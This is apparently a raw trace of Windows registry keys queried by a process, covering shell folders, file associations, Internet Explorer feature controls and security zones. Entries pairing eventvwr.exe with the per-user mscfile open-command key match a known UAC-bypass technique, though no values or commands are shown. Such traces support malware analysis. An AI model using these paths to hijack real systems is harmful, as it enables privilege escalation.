HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KnownFolderSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.msc
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\DelegateExecute
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\DropTarget
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.fxp
HKEY_CLASSES_ROOT\.gadget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gadget\(Default)
HKEY_CLASSES_ROOT\.grp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.grp\(Default)
HKEY_CLASSES_ROOT\.hlp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hlp\(Default)
HKEY_CLASSES_ROOT\.hta
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.hta\(Default)
HKEY_CLASSES_ROOT\.inf
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.inf\(Default)
HKEY_CLASSES_ROOT\.ins
HKEY_CLASSES_ROOT\.isp
HKEY_CLASSES_ROOT\.its
HKEY_CLASSES_ROOT\.js
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_CLASSES_ROOT\.jse
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.JSE\(Default)
HKEY_CLASSES_ROOT\.ksh
HKEY_CLASSES_ROOT\.lnk
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)
HKEY_CLASSES_ROOT\.mad
HKEY_CLASSES_ROOT\.maf
HKEY_CLASSES_ROOT\.mag
HKEY_CLASSES_ROOT\.mam
HKEY_CLASSES_ROOT\.maq
HKEY_CLASSES_ROOT\.mar
HKEY_CLASSES_ROOT\.mas
HKEY_CLASSES_ROOT\.mat
HKEY_CLASSES_ROOT\.mau
HKEY_CLASSES_ROOT\.mav
HKEY_CLASSES_ROOT\.maw
HKEY_CLASSES_ROOT\.mcf
HKEY_CLASSES_ROOT\.mda
HKEY_CLASSES_ROOT\.mdb
HKEY_CLASSES_ROOT\.mde
HKEY_CLASSES_ROOT\.mdt
HKEY_CLASSES_ROOT\.mdw
HKEY_CLASSES_ROOT\.mdz
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\eventvwr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\eventvwr.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\eventvwr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\eventvwr.exe
